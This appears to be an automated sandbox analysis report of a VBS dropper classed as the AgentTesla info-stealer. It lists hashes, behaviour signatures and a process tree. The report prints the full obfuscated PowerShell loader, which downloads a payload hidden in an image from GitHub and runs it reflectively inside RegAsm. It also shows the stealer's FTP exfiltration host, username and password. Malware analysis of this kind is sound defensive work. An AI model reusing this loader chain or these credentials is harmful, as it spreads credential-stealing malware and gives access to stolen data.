Overview

overview

10

Static

static

1

333343MPDW...ts.vbs

windows7-x64

10

333343MPDW...ts.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    439s
  • max time network
    441s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    11-10-2024 22:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    333343MPDW-constraints.vbs

  • Size

    96KB

  • MD5

    68f1806fe9b9ef502b39df87c915c1a3

  • SHA1

    be6a50cfb696458781876d0a0c5a2b7bbd122003

  • SHA256

    1bdfe6f21b7a29417448cf67abaa31b40e05c36565fba5d6ae87d69a0b34919a

  • SHA512

    e8cac45dc1f8f21775e8a164289c49e8b44d858a2b1e5c4bff8dab7a487ec2b3582baa3af0316dc337f2b28254a4b1b032ba9a9ef7cae14cc7330896e2e2faf0

  • SSDEEP

    1536:VT1yJpqU2CAFLOkZfnW/tiBOTc2EkeJ7gZOg/B4659GLj+vASLQLrjnXflpxc:VT1TCAkkZfiYSbzRZ4659GfG8LrLfjq

Score
10/10
agenttesladiscoveryexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20
exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.elquijotebanquetes.com
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    4r@d15PS!-!h

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\333343MPDW-constraints.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4076
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9JysnaW1hZ2VVcmwgPSB7MX1odHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQ3J5cHRlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMvJysnbWFpbi9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PJysnYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCeXRlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHswfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsnKycxfTw8QkFTRTY0X1NUJysnQVJUPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRTY0X0VORD4+ezF9O3swfXN0YXJ0SW4nKydkZXggPSB7MH1pbWFnZVRleHQuSW5kZXgnKydPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXgnKyd0LkluZGV4T2YoezB9ZW5kRmxhZyk7ezB9c3RhcnRJbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC1ndCB7MH1zdGFydCcrJ0luZCcrJ2V4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhcnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGggPSB7MH1lbmRJbmRleCAtJysnIHswfXN0YXJ0SW5kZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltYWdlVGV4dC5TdWJzdHJpbmcnKycoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3QnKydyaW5nJysnKHswfWJhc2U2NENvbW1hbmQpO3swfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MH1jbycrJ20nKydtYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoezF9VicrJ0FJezF9KTt7MH12YWlNZXRob2QuSW52b2tlKHswfScrJ251bGwsIEAoezF9dHh0LjQ0NDQ2ZXNhYmJiYmJiZXdtYWRhbS80MzEuODcxLjY0Ljg5MS8vOnB0dGh7JysnMX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfVJlZ0FzbXsxfSwnKycgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSkpOycpIC1mIFtjSEFyXTM2LFtjSEFyXTM5KSB8IC4oICRzSGVMbElkWzFdKyRzaEVsbGlkWzEzXSsneCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3272
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}'+'imageUrl = {1}https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/'+'main/DetahNote_V.jpg {1};{0}webClient = New-O'+'bject System.Net.WebClient;{0}imageBytes = {0}webClient.DownloadData({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString({0}imageBytes);{0}startFlag = {'+'1}<<BASE64_ST'+'ART>>{1};{0}endFlag = {1}<<BASE64_END>>{1};{0}startIn'+'dex = {0}imageText.Index'+'Of({0}startFlag);{0}endIndex = {0}imageTex'+'t.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {0}endIndex -gt {0}start'+'Ind'+'ex;{0}startIndex += {0}startFlag.Length;{0}base64Length = {0}endIndex -'+' {0}startIndex;{0}base64Command = {0}imageText.Substring'+'({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64St'+'ring'+'({0}base64Command);{0}loadedAssembly = [System.Reflection.Assembly]::Load({0}co'+'m'+'mandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({1}V'+'AI{1});{0}vaiMethod.Invoke({0}'+'null, @({1}txt.44446esabbbbbbewmadam/431.871.64.891//:ptth{'+'1}, {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}RegAsm{1},'+' {1}desativado{1}, {1}desativado{1}));') -f [cHAr]36,[cHAr]39) | .( $sHeLlId[1]+$shEllid[13]+'x')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:440
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
              PID:4192
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1992

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        f41839a3fe2888c8b3050197bc9a0a05

        SHA1

        0798941aaf7a53a11ea9ed589752890aee069729

        SHA256

        224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

        SHA512

        2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        f9827a3f8b75bdf2ef47cee6e7394395

        SHA1

        01630763a0722ee3df60eb0c1299dc0cbb587b8f

        SHA256

        ba893c7bf34670ce1397a590a7141d343e2ed2b202c645249ad190bedfd9a00b

        SHA512

        e1470d39b4ca73dcca0dbbf99d0deb98b57850a21512671cb3332672ea736f25724cad9c1dc1b8fd1cbd630ff0d8809da343160e20fb0ee5d7b7242ba7259783

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kb1back2.0ih.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • memory/1836-25-0x000001FEE1E70000-0x000001FEE22B8000-memory.dmp

        Filesize

        4.3MB

        Download

      • memory/1992-38-0x00000000066D0000-0x00000000066DA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/1992-37-0x0000000006780000-0x00000000067D0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/1992-36-0x0000000006890000-0x0000000006992000-memory.dmp

        Filesize

        1.0MB

        Download

      • memory/1992-35-0x00000000066E0000-0x0000000006772000-memory.dmp

        Filesize

        584KB

        Download

      • memory/1992-34-0x00000000054D0000-0x0000000005536000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1992-33-0x0000000005980000-0x0000000005F24000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/1992-26-0x0000000000400000-0x0000000000442000-memory.dmp

        Filesize

        264KB

        Download

      • memory/3272-13-0x00007FF842150000-0x00007FF842C11000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3272-32-0x00007FF842150000-0x00007FF842C11000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3272-15-0x00000180DB1A0000-0x00000180DB1C2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3272-14-0x00007FF842150000-0x00007FF842C11000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3272-0-0x00007FF842153000-0x00007FF842155000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3272-12-0x00000180DB480000-0x00000180DB582000-memory.dmp

        Filesize

        1.0MB

        Download

      • memory/3272-11-0x00000180DB160000-0x00000180DB170000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3272-1-0x00000180DB1E0000-0x00000180DB262000-memory.dmp

        Filesize

        520KB

        Download